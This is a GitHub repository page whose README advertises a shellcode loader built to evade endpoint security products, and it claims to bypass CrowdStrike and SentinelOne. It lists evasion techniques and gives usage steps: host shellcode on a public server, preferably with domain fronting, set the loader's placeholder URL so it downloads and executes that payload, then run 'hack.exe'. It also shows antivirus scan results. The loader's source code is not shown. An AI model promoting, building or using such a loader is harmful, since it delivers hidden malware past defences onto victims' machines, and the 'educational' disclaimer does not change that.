Skip to content
/ EDR-XDR-AV-Bypass-Shellcode-Loader Public
forked from EvilBytecode/EDR-XDR-AV-Bypass-Shellcode-Loader

Bypassing Major EDR's with staged shellcode, custom getmodulehandleW and getprocaddress, veh syscalls & more.

0 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Gzeo/EDR-XDR-AV-Bypass-Shellcode-Loader

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
README.md
README.md
 
 
SED.h
SED.h
 
 
build.bat
build.bat
 
 
codepulzeispapa.asm
codepulzeispapa.asm
 
 
custom_getmodulehandlea.h
custom_getmodulehandlea.h
 
 
peb.h
peb.h
 
 
remote.cpp
remote.cpp
 
 

Repository files navigation

EDR-XDR-AV-Bypass-Shellcode-Loader

  • CURRENTLY BYPASSES CROWDSTRIKE & SENTINEL ONE RUNTIME.
  • SCROLL DOWN TO FIND DETECTIONS (RUNTIME & STATIC TIME ANALYSIS)

image

Overview

This project provides an advanced shellcode loader capable of bypassing major EDRs (Endpoint Detection and Response), XDRs, and AV (Antivirus) systems. The shellcode is executed in a staged manner with techniques such as memory protection manipulation, VEH (Vectored Exception Handling), and system calls to evade detection.

Features

  • Staged Shellcode Execution: Downloads and executes shellcode in multiple steps to minimize detection.
  • Custom Memory Protection: Evading modern AntiVirus memory scanners by encrypting a function during runtime, then decrypting it when the function needs to be executed, then re-encrypting the function once the function has finished executing
  • Vectored Exception Handling (VEH): Handles memory access violations and redirects execution flow.
  • Encrypted Shellcode: Shellcode is encrypted during download and decrypted in-memory before execution.
  • Custom GetProcessAddress & GetModuleHandleW

Prerequisites

  • Windows Operating System (x64)
  • Visual Studio or compatible C++ compiler
  • Internet connection (for staged shellcode download)

Usage

Build

  1. Clone the repository:
  2. Open the project in Visual Studio or your preferred C++ environment (i use vsc).
  3. Compile the project in Release mode for a production-ready executable.

Execution

  1. Host the shellcode binary on a remote server (e.g., Discord, AWS, or any public URL, works best with domain fronting).
  2. Update the shellcode URL in the main function: 
    std::wstring url = L"https://your-hosted-url/shellcode.bin";
  3. Run the executable: 
    hack.exe

DETECTIONS (scanner.to / kleenscan)

image image image

Disclaimer

This tool is intended for educational and research purposes only. Misuse of this tool for malicious purposes is strictly prohibited and against the law. The author does not condone or support any illegal activity.

Refernces that might help you:

About

Bypassing Major EDR's with staged shellcode, custom getmodulehandleW and getprocaddress, veh syscalls & more.

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • C 73.6%
  • C++ 23.7%
  • Assembly 1.4%
  • Batchfile 1.3%